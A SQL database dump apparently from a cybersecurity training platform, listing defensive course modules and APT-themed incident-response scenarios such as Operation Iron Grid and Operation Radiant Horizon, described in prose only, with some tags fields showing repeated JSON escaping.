(4, 1, 'Networking Essentials', 'Learn the OSI model, TCP/IP, subnetting, and common network protocols.', 30, 4, NULL, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07'),
(9, 1, 'Windows Fundamentals', 'Master Windows OS, Active Directory basics, and PowerShell for security operations.', 16, 3, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 03:05:08'),
(10, 1, 'Security Principles', 'Core security concepts: CIA Triad, AAA, encryption, defense in depth.', 14, 5, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 03:05:08'),
(11, 1, 'Windows Command Line', 'Master essential Windows commands: Navigation, Files, Networking, and Processes.', 5, 6, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 21:05:12'),
(12, 2, 'Log Analysis Fundamentals', 'Master the art of reading logs, from basic authentication to advanced attack detection.', 8, 0, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 21:08:58'),
(14, 2, 'Web Proxies Fundamentals', 'Understand how proxies work, how to intercept traffic, and the basics of Burp Suite.', 5, 0, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 21:17:42'),
(15, 2, 'Introduction to IDS/IPS', 'Comprehensive guide to Intrusion Detection and Prevention Systems.', 15, 0, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:20'),
(16, 2, 'Vulnerability Scanning', 'Master the Vulnerability Management Lifecycle.', 15, 0, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21'),
(17, 2, 'Web App Scanning (DAST)', 'Dynamic Application Security Testing deep dive.', 15, 0, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21'),
(18, 2, 'Introduction to OSINT', 'Master Open Source Intelligence gathering techniques and tools.', 15, 0, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 22:25:25'),
(19, 2, 'Phishing & Email Analysis', 'Learn to dissect email headers and investigate phishing attacks.', 15, 0, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 22:25:25'),
(20, 2, 'Social Engineering Defense', 'Understand the human element of security and how to defend against manipulation.', 15, 0, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 22:28:54'),
(21, 2, 'Virtualization & Lab Setup', 'Build your own safe hacking laboratory using Virtual Machines.', 15, 0, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 22:32:26'),
(22, 3, 'SIEM Fundamentals', 'Master the \"Brain\" of the SOC: Security Information and Event Management.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-26 22:35:58'),
(23, 3, 'SIEM Use Cases', 'Practical log analysis scenarios ranging from Easy to Data Exfiltration.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-26 22:41:26'),
(24, 3, 'EDR Concepts', 'Master Endpoint Detection & Response: Telemetry, Process Trees, and Threat Hunting.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-26 22:47:08'),
(25, 3, 'Intrusion Detection', 'Learn to identify and investigate network and host-based intrusions.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-26 22:50:58'),
(26, 3, 'Malware Analysis Basics', 'Learn to safely analyze malware: Static, Dynamic, and Behavioral techniques.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-26 22:55:56'),
(27, 3, 'Incident Response Framework', 'Master the structured approach to handling security incidents.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-27 02:12:47'),
(28, 3, 'Digital Forensics Intro', 'Learn the fundamentals of collecting and analyzing digital evidence.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-27 02:12:47'),
(29, 3, 'Network Traffic Analysis', 'Learn to capture and analyze network packets for threat detection.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-27 02:12:47'),
(30, 3, 'Threat Hunting Basics', 'Proactively search for threats before they cause damage.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-27 02:12:47'),
(31, 3, 'MITRE ATT&CK Framework', 'Understand the knowledge base of adversary tactics and techniques.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-27 02:12:47'),
(32, 3, 'Cloud Security Basics', 'Understand security challenges and controls in cloud environments.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-27 02:12:47'),
(33, 3, 'Security Automation', 'Learn to automate security tasks using SOAR and scripting.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-27 02:12:47'),
(34, 3, 'Reporting & Documentation', 'Master the art of documenting investigations and writing reports.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-27 02:12:47'),
(36, 4, 'Advanced SIEM', 'Deep dive into SIEM engineering: Query optimization, custom parsers, and correlation logic.', 15, 0, NULL, 1, '2025-12-26 02:45:47', '2025-12-27 02:16:31'),
(37, 4, 'Memory Forensics', 'Analyze volatile memory to uncover malware, rootkits, and attacker artifacts.', 15, 0, NULL, 1, '2025-12-26 02:45:47', '2025-12-27 02:18:03'),
(38, 4, 'Malware Reverse Engineering', 'Disassemble and analyze malicious code to understand its behavior.', 15, 0, NULL, 1, '2025-12-26 02:45:47', '2025-12-27 02:19:34'),
(39, 4, 'Advanced Threat Intelligence', 'Operationalize threat intel: Collection, analysis, dissemination, and integration.', 15, 0, NULL, 1, '2025-12-26 02:45:47', '2025-12-27 02:21:00'),
(40, 4, 'Red vs Blue Team Dynamics', 'Purple teaming: Collaboration between offensive and defensive security.', 15, 0, NULL, 1, '2025-12-26 02:45:47', '2025-12-27 02:22:23'),
(41, 4, 'Purple Teaming Exercises', 'Hands-on exercises combining offensive execution with defensive detection.', 15, 0, NULL, 1, '2025-12-26 02:45:47', '2025-12-27 02:26:00'),
(42, 4, 'Container Security', 'Secure Docker, Kubernetes, and container orchestration environments.', 15, 0, NULL, 1, '2025-12-26 02:45:47', '2025-12-27 02:27:22'),
(43, 4, 'Zero Trust Architecture', 'Never trust, always verify: Implementing zero trust principles.', 15, 0, NULL, 1, '2025-12-26 02:45:47', '2025-12-27 02:28:42'),
(44, 4, 'Compliance & Frameworks', 'Navigate security compliance: NIST, ISO, SOC 2, PCI-DSS, and HIPAA.', 15, 0, NULL, 1, '2025-12-26 02:45:47', '2025-12-27 02:30:07'),
(49, 9, 'EDR Investigations', 'Learn about EDR Investigations', 0, 1, NULL, 1, '2025-12-26 17:59:30', '2025-12-26 17:59:30'),
(51, 9, 'SIEM Log Analysis', 'Learn about SIEM Log Analysis', 0, 3, NULL, 1, '2025-12-26 17:59:30', '2025-12-26 17:59:30'),
(52, 9, 'Email Security & Phishing', 'Learn about Email Security & Phishing', 0, 4, NULL, 1, '2025-12-26 17:59:31', '2025-12-26 17:59:31'),
(53, 9, 'Vulnerability Management', 'Learn about Vulnerability Management', 0, 5, NULL, 1, '2025-12-26 17:59:31', '2025-12-26 17:59:31'),
(117, 6, 'CTI Fundamentals', 'Foundations of Cyber Threat Intelligence: The Intelligence Cycle, Types of Intel, and Pyramid of Value.', 3, 1, NULL, 1, '2025-12-29 13:30:44', '2025-12-29 13:30:44'),
(118, 6, 'OSINT Techniques', 'Open Source Intelligence: Gathering data from public sources using passive reconnaissance.', 4, 2, NULL, 1, '2025-12-29 13:30:45', '2025-12-29 13:30:45'),
(119, 6, 'Malware Analysis', 'Understand malware behavior, static vs dynamic analysis, and sandboxing.', 4, 3, NULL, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(120, 6, 'Indicators & Standards', 'IOCs, IOAs, TLP, and STIX/TAXII standards.', 3, 4, NULL, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(121, 6, 'MITRE ATT&CK', 'Master the framework.', 4, 5, NULL, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(122, 6, 'Threat Hunting', 'Proactive search for threats. Stacking, Clustering, and Hypothesis driven hunting.', 4, 6, NULL, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(123, 6, 'Intelligence Platforms', 'Using MISP and OpenCTI.', 5, 7, NULL, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(124, 6, 'Reporting & Dissemination', 'Writing effective reports for different audiences.', 2, 8, NULL, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32');

-- --------------------------------------------------------

--
-- Table structure for table `notifications`
--

DROP TABLE IF EXISTS `notifications`;
CREATE TABLE `notifications` (
  `id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,
  `message` text DEFAULT NULL,
  `is_read` tinyint(1) DEFAULT 0,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp()
) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;

-- --------------------------------------------------------

--
-- Table structure for table `operations`
--

DROP TABLE IF EXISTS `operations`;
CREATE TABLE `operations` (
  `id` int(11) NOT NULL,
  `title` varchar(255) NOT NULL,
  `apt_group` varchar(255) DEFAULT NULL,
  `description` text DEFAULT NULL,
  `story_intro` text DEFAULT NULL,
  `difficulty_level` varchar(50) DEFAULT NULL,
  `display_order` int(11) DEFAULT 0,
  `is_active` tinyint(1) DEFAULT 1,
  `is_premium` tinyint(1) DEFAULT 0,
  `passing_grade` int(11) DEFAULT 60,
  `time_limit_hours` int(11) DEFAULT NULL,
  `tags` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL CHECK (json_valid(`tags`)),
  `scenario_prompt` text DEFAULT NULL,
  `total_alerts` int(11) DEFAULT 0,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp(),
  `seo_title` varchar(255) DEFAULT NULL,
  `seo_description` text DEFAULT NULL,
  `slug` varchar(255) DEFAULT NULL,
  `min_level` int(11) DEFAULT 1
) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;

--
-- Dumping data for table `operations`
--

INSERT INTO `operations` (`id`, `title`, `apt_group`, `description`, `story_intro`, `difficulty_level`, `display_order`, `is_active`, `is_premium`, `passing_grade`, `time_limit_hours`, `tags`, `scenario_prompt`, `total_alerts`, `created_at`, `seo_title`, `seo_description`, `slug`, `min_level`) VALUES
(1, 'Operation Iron Grid', 'Sandworm (Russian GRU)', 'Investigate a massive power outage affecting critical infrastructure. Use OT/ICS forensics to track the attacker\'s pivot from the corporate IT network into the SCADA control systems using BlackEnergy malware variants.\n', '', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"[]\\\"\"', '', 5, '2025-12-31 13:08:59', NULL, NULL, 'operation-iron-grid', 1),
(2, 'Operation Silent Tsunami', 'Lazarus Group (North Korea)', 'A major decentralized finance (DeFi) platform has been drained of $600M. Trace the laundered cryptocurrency through mixer services and analyze the social engineering campaign that targeted developers with weaponized job offers.\n', '', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"[]\\\"\"', '', 4, '2025-12-31 13:42:03', NULL, NULL, 'operation-silent-tsunami', 1),
(3, 'Operation Glass Serpent', 'APT41 (Barium)', 'A distinct supply chain attack compromising a popular server management software. Identify the malicious DLL injection in the signed update package and track the actor\'s dual-mission of espionage and financial theft across victim networks.\n', '', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[]\\\\\\\"\\\"\"', '', 4, '2025-12-31 13:44:55', 'Operation Glass Serpent', 'A distinct supply chain attack compromising a popular server management software. Identify the malicious DLL injection in the signed update package and track the actor\'s dual-mission of espionage and financial theft across victim networks.\n', 'operation-glass-serpent', 1),
(4, 'Operation Phantom Ballot', 'APT28 (Fancy Bear)', 'Uncover a disinformation and spear-phishing campaign targeting political organizations ahead of a national election. Analyze leaked documents, track domain infrastructure used for credential harvesting, and identify the OAuth token abuse techniques.\n', '', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"\\\\\\\\\\\\\\\"[]\\\\\\\\\\\\\\\"\\\\\\\"\\\"\"', '', 4, '2025-12-31 15:16:16', 'Operation Phantom Ballot', 'Uncover a disinformation and spear-phishing campaign targeting political organizations ahead of a national election. Analyze leaked documents, track domain infrastructure used for credential harvesting, and identify the OAuth token abuse techniques.\n', 'operation-phantom-ballot', 1),
(5, 'Operation Black Harvest', 'Wizard Spider (Ryuk/Conti)', 'Respond to a catastrophic ransomware attack paralyzing a regional hospital network. Recover patient data from shadow copies, identify the initial access broker\'s entry point via TrickBot, and trace the lateral movement using Cobalt Strike beacons.', '', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[]\\\\\\\"\\\"\"', '', 5, '2025-12-31 15:21:18', 'Operation Black Harvest', 'Respond to a catastrophic ransomware attack paralyzing a regional hospital network. Recover patient data from shadow copies, identify the initial access broker\'s entry point via TrickBot, and trace the lateral movement using Cobalt Strike beacons.', 'operation-black-harvest', 1),
(6, 'Operation Golden Ticket', 'Carbanak / FIN7', 'A global banking heist involving the manipulation of ATM withdrawal limits and SWIFT transaction gateways. Analyze the specialized administrative tools used by the attackers to impersonate bank clerks and authorize fraudulent transfers.\n', '', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"[]\\\"\"', '', 4, '2025-12-31 15:22:51', 'Operation Golden Ticket', 'A global banking heist involving the manipulation of ATM withdrawal limits and SWIFT transaction gateways. Analyze the specialized administrative tools used by the attackers to impersonate bank clerks and authorize fraudulent transfers.\n', 'operation-golden-ticket', 1),
(7, 'Operation Desert Mirage', 'APT34 (OilRig)', 'A simulated cyber operation led by the APT34 group aimed at infiltrating a multinational energy corporation to exfiltrate sensitive geological data.', 'In this scenario, participants will defend against a targeted cyber attack by APT34, also known as OilRig. The group is known for its focus on the energy sector, and they are suspected to be backed by a nation-state. The exercise will challenge participants to identify and mitigate threats across multiple stages of an advanced persistent threat operation.', 'intermediate', 0, 1, 1, 60, NULL, '[]', '', 5, '2026-01-02 04:27:59', NULL, NULL, 'operation-desert-mirage', 1),
(8, 'Operation Silent Harvest', 'APT10 (Stone Panda)', 'This training scenario simulates a cyber attack by APT10 (Stone Panda), known for its sophisticated cyber espionage campaigns. Participants will navigate through a series of alerts representing different stages of an attack, aiming to understand and mitigate each threat effectively.', 'In recent months, there has been an increase in suspicious activities targeting a fictional multinational corporation, TechGlobal Inc. Intelligence suggests that APT10 is behind these attacks, with the intent to exfiltrate sensitive intellectual property and confidential business data. Your task is to identify and neutralize the threats as they unfold.', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[]\\\\\\\"\\\"\"', '', 5, '2026-01-02 20:23:41', NULL, NULL, 'operation-silent-harvest', 1),
(9, 'Operation Infinite Loop', 'Equation Group / Lamberts', 'Analyze a sophisticated firmware implant discovered on enterprise firewalls. This advanced persistent threat persists across reboots and OS re-installations. Conduct low-level forensic analysis of the SPI flash memory to extract the payload.', '', 'advanced', 0, 1, 1, 60, NULL, '[]', NULL, 10, '2026-01-02 20:26:53', NULL, NULL, 'operation-infinite-loop', 1),
(10, 'Operation Ocean Lotus', 'APT32 (OceanLotus)', 'A targeted watering hole attack on a human rights organization\'s website. Users are infected with a custom backdoor upon visiting the site. Analyze the obfuscated JavaScript payload and the subsequent macOS malware deployment.\n', '', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"\\\\\\\\\\\\\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\"[]\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\"\\\\\\\\\\\\\\\"\\\\\\\"\\\"\"', '', 5, '2026-01-02 20:30:06', 'Operation Ocean Lotus', 'A targeted watering hole attack on a human rights organization\'s website. Users are infected with a custom backdoor upon visiting the site. Analyze the obfuscated JavaScript payload and the subsequent macOS malware deployment.\n', 'operation-ocean-lotus', 1),
(11, 'Operation Radiant Horizon', 'Hafnium (China)', 'Train in identifying and mitigating Hafnium\'s exploitation of Exchange servers using ProxyLogon and China Chopper.', 'In early 2021, organizations worldwide faced a sophisticated onslaught by Hafnium, a Chinese state-sponsored APT group. This scenario puts you in the shoes of a cyber defense team responding to a mass exploitation event targeting on-premise Exchange servers. Your mission: analyze web shell artifacts, uncover the chain of zero-day vulnerabilities used for initial access, and determine the scope of data exfiltration. This advanced training will test your skills in real-world threat detection and incident response.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Hafnium\\\\\\\",\\\\\\\"ProxyLogon\\\\\\\",\\\\\\\"China Chopper\\\\\\\",\\\\\\\"Exchange Server Exploitation\\\\\\\",\\\\\\\"Cybersecurity Training\\\\\\\"]\\\"\"', '', 8, '2026-01-03 00:02:24', 'Advanced Response to Hafnium\'s Mass Exploitation of Exchange Servers', 'Train in identifying and mitigating Hafnium\'s exploitation of Exchange servers using ProxyLogon and China Chopper.', 'operation-radiant-horizon', 1),
(12, 'Operation Silent Star', 'Turla (Snake / Uroburos)', 'Investigate Turla\'s hijacking of satellite links to mask C2 locations using rootkits on diplomatic networks.', 'In a world where digital espionage knows no bounds, the notorious Turla group has taken cyber warfare to new heights. By hijacking commercial satellite internet links, they\'ve crafted an insidious method to conceal their command and control locations. As a cyber threat analyst, your mission is to dismantle this operation by tracing the hijacked downstream traffic and unearthing the sophisticated rootkit deployed within diplomatic networks. Can you unravel the layers of deception and thwart Turla\'s ambitions?', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Turla APT\\\\\\\",\\\\\\\"cyber espionage\\\\\\\",\\\\\\\"satellite hijacking\\\\\\\",\\\\\\\"network security\\\\\\\",\\\\\\\"rootkit analysis\\\\\\\"]\\\"\"', '', 5, '2026-01-03 00:36:50', 'Operation Satellite Serpent: Uncovering Turla\'s Covert Channels', 'Investigate Turla\'s hijacking of satellite links to mask C2 locations using rootkits on diplomatic networks.', 'operation-silent-star', 1),
(13, 'Operation Dragon Breath', 'APT40 (Periscope)', 'Uncover APT40\'s tactics in stealing maritime research data via compromised servers and custom malware.', 'In an unprecedented cyber breach, APT40 has targeted a naval engineering university, stealing sensitive maritime research data. Analysts must uncover how compromised web servers were used as relay points and analyze the custom malware deployed to exfiltrate proprietary sonar technology schematics. This operation requires a keen understanding of APT40\'s tactics and technical prowess to unravel their sophisticated attack chain.', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"APT40\\\\\\\",\\\\\\\"cybersecurity training\\\\\\\",\\\\\\\"maritime data breach\\\\\\\",\\\\\\\"custom malware\\\\\\\",\\\\\\\"threat analysis\\\\\\\"]\\\"\"', '', 5, '2026-01-03 00:41:42', 'Investigating APT40\'s Maritime Data Heist', 'Uncover APT40\'s tactics in stealing maritime research data via compromised servers and custom malware.', 'operation-dragon-breath', 1),
(14, 'Operation Wasted Locker', 'Evil Corp (Indrik Spider)', 'Engage in simulated ransomware negotiation and decryption against Evil Corp in this advanced cybersecurity training scenario.', 'In a high-stakes cybersecurity operation, a Fortune 500 company falls victim to a sophisticated ransomware attack by the notorious APT group, Evil Corp. As the company\'s data is held hostage, your team is tasked with negotiating with the attackers while simultaneously reverse-engineering the malware to identify a vulnerability in its encryption. The initial infection vector is traced back to a cunning drive-by download, demonstrating Evil Corp\'s technical prowess. Can you outsmart the attackers, recover the data, and trace the attack back to its source?', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"ransomware\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Evil Corp\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"APT\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"cybersecurity training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"malware analysis\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 7, '2026-01-03 00:49:14', 'Evil Corp Ransomware Negotiation and Decryption Challenge', 'Engage in simulated ransomware negotiation and decryption against Evil Corp in this advanced cybersecurity training scenario.', 'operation-wasted-locker', 1),
(15, 'Operation Soft Cell', 'Gallium (Soft Cell)', 'Beginner-level scenario to detect and remediate Gallium APT\'s long-term intrusion in telecoms capturing call records.', 'In this training scenario, participants will dive into the covert world of cyber espionage as they work to uncover and disrupt Gallium APT\'s intrusion into global telecommunications networks. The attackers are meticulously capturing Call Detail Records of high-value targets, using stealthy web shells and \'living off the land\' tactics to remain undetected. Trainees will learn to identify these threats and employ effective remediation strategies.', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"Gallium APT\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"telecommunications security\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"web shell detection\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"cyber threat intelligence\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"call detail record\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 5, '2026-01-03 00:53:35', 'Gallium APT: Telecom Intrusion Detection Training', 'Beginner-level scenario to detect and remediate Gallium APT\'s long-term intrusion in telecoms capturing call records.', 'operation-soft-cell', 1),
(16, 'Operation Rabid Dog', 'MuddyWater (Static Kitten)', 'Uncover and mitigate MuddyWater\'s destructive wiper attack disguised as ransomware against a government agency.', 'In the heart of a bustling government agency, a seemingly routine email arrives, carrying a sinister payload. The notorious APT group MuddyWater, known for their cunning tactics, has launched a deceptive wiper attack, masquerading as ransomware. The operation requires the team to dissect the macro-enabled document that serves as the initial vector, analyze the embedded \'POWERSTATS\' backdoor, and extract critical forensic artifacts before the destructive wiping logic can execute. The race against the clock is on, as every second counts in preventing irreversible damage.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"MuddyWater\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"wiper attack\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"ransomware\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"cybersecurity training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"APT\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 10, '2026-01-03 23:50:48', 'MuddyWater\'s Deceptive Wiper Attack on Government Infrastructure', 'Uncover and mitigate MuddyWater\'s destructive wiper attack disguised as ransomware against a government agency.', 'operation-rabid-dog', 1),
(17, 'Operation Horizon', 'APT1 ', 'Engage in a beginner-friendly cyber operation simulation featuring APT1\'s well-known tactics and techniques.', 'In this training scenario, participants will dive into a simulated cyber espionage operation orchestrated by the notorious APT1 group. Known for its sophisticated attacks and persistence, APT1 has launched a new campaign targeting a fictional global manufacturing company. Trainees will navigate through realistic alerts to identify and mitigate threats, gaining insights into APT1\'s tactics, techniques, and procedures (TTPs) as they progress through the attack lifecycle.', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"cybersecurity training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"APT1 operation\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"beginner cyber scenario\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"threat intelligence\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"cyber espionage\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 5, '2026-01-04 00:58:38', 'APT1 Cyber Espionage Scenario: Beginner\'s Threat Simulation', 'Engage in a beginner-friendly cyber operation simulation featuring APT1\'s well-known tactics and techniques.', 'operation-horizon', 1),
(18, 'Operation Gothic Panda', 'APT3 (Gothic Panda)', 'Train to counter APT3\'s sophisticated cyberattack, simulating their known TTPs in a realistic, intermediate-level scenario.', 'In this scenario, your organization is targeted by APT3, also known as Gothic Panda, a notorious cyber espionage group. Known for their sophisticated techniques and extensive resource access, APT3 has set its sights on exfiltrating your company\'s sensitive data. Your mission is to navigate through a series of alerts, utilizing threat intelligence and defensive strategies to thwart their multi-stage infiltration attempt.', 'Intermediate', 0, 1, 1, 60, NULL, '\"[]\"', '', 5, '2026-01-04 02:06:57', 'Defend Against Gothic Panda\'s Multi-Stage Infiltration', 'Train to counter APT3\'s sophisticated cyberattack, simulating their known TTPs in a realistic, intermediate-level scenario.', 'operation-gothic-panda', 1),
(19, 'Operation Red Apollo', 'APT10 (MenuPass)', 'Explore APT10\'s DLL side-loading techniques in a complex aerospace sector espionage campaign.', 'In the ever-evolving landscape of cyber threats, APT10, also known as MenuPass, has launched a sophisticated espionage campaign targeting the aerospace industry. Leveraging DLL side-loading techniques, the threat actors aim to infiltrate, persist, and exfiltrate critical intellectual property, including large CAD files, to gain a competitive edge in aerospace technology.', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"APT10\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"DLL Side-Loading\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Aerospace Espionage\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Cybersecurity Training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Intellectual Property Theft\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 7, '2026-01-04 02:13:24', 'APT10\'s Aerospace Espionage - DLL Side-Loading Tactics', 'Explore APT10\'s DLL side-loading techniques in a complex aerospace sector espionage campaign.', 'operation-red-apollo', 1),
(20, 'Operation Whitefly', 'Whitefly (Singapore-based?)', 'Investigate Whitefly APT\'s breach using Vcrodat malware in the healthcare sector, focusing on persistence and compromised open-source tools.', 'In this advanced scenario, analysts are tasked with investigating a sophisticated breach within the healthcare and materials science sectors. The notorious Whitefly APT group has employed their custom Vcrodat malware to maintain persistence while cleverly blending their malicious activities with legitimate developer behaviors by compromising open-source tools. Participants will need to piece together clues from multiple alerts to unravel the attackers\' tactics, techniques, and procedures.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Whitefly APT\\\\\\\",\\\\\\\"Vcrodat malware\\\\\\\",\\\\\\\"cybersecurity training\\\\\\\",\\\\\\\"healthcare breach\\\\\\\",\\\\\\\"open-source compromise\\\\\\\"]\\\"\"', '', 7, '2026-01-04 02:14:54', 'Advanced Breach Investigation: Whitefly APT in Healthcare', 'Investigate Whitefly APT\'s breach using Vcrodat malware in the healthcare sector, focusing on persistence and compromised open-source tools.', 'operation-whitefly', 1),
(21, 'Operation Silent Shield', 'Kimsuky (Velvet Chollima)', 'Explore Kimsuky\'s use of malicious browser extensions and BabyShark malware in a targeted spear-phishing campaign.', 'In a rapidly evolving cyber landscape, the global think tank specializing in nuclear policy finds itself under siege. The notorious APT group Kimsuky, known for its advanced tactics, has launched a spear-phishing campaign employing malicious browser extensions and the insidious BabyShark malware. As a beginner analyst, your mission is to unravel the layers of this attack, tracing each step from initial access to data exfiltration, and fortifying defenses against future threats.', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"Kimsuky APT\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"spear-phishing\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"BabyShark malware\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"cybersecurity training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"nuclear policy\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 5, '2026-01-04 02:18:07', 'Kimsuky Spear-Phishing Tactics Against Nuclear Policy Think Tanks', 'Explore Kimsuky\'s use of malicious browser extensions and BabyShark malware in a targeted spear-phishing campaign.', 'operation-silent-shield', 1),
(22, 'Operation Double Dragon', 'APT41 (Double Dragon)', 'Investigate APT41\'s dual-mode operation targeting gaming source code and PII for espionage.', 'In this advanced training scenario, participants will track APT41, a notorious cyber threat actor known for conducting both state-sponsored espionage and financially-motivated attacks. The operation begins with the theft of strategic game source code for profit and pivots to a more sinister goal: accessing databases containing citizens\' PII. As they unravel this complex operation, participants will navigate through sophisticated supply chain attacks and lateral movements emblematic of APT41\'s tactics, techniques, and procedures.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"APT41\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Cyber Espionage\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Gaming Industry\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Supply Chain Attack\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"PII Theft\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 5, '2026-01-04 02:21:13', 'APT41: Dual-Mode Cyber Operation Training', 'Investigate APT41\'s dual-mode operation targeting gaming source code and PII for espionage.', 'operation-double-dragon', 1),
(23, 'Operation Red Echo', 'APT41 / RedEcho', 'Engage with APT41 tactics in Operation Red Echo, a realistic cyber defense scenario for intermediate analysts.', 'In this immersive training scenario, participants are tasked with defending a fictional telecom company under siege by the notorious APT41, known as RedEcho. This advanced persistent threat group, originating from China, has launched a multi-vector attack, leveraging their expertise in supply chain compromises and ransomware to infiltrate the company\'s network. Your mission is to detect, analyze, and mitigate the threats as they unfold in a five-step attack sequence. Can you thwart RedEcho\'s espionage and financial motives before critical data is exfiltrated?', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"APT41\\\\\\\",\\\\\\\"RedEcho\\\\\\\",\\\\\\\"Cyber Defense Training\\\\\\\",\\\\\\\"Intermediate Cybersecurity\\\\\\\",\\\\\\\"Supply Chain Attack\\\\\\\"]\\\"\"', '', 5, '2026-01-04 04:11:04', 'Operation Red Echo: Intermediate Cyber Defense Training', 'Engage with APT41 tactics in Operation Red Echo, a realistic cyber defense scenario for intermediate analysts.', 'operation-red-echo', 1),
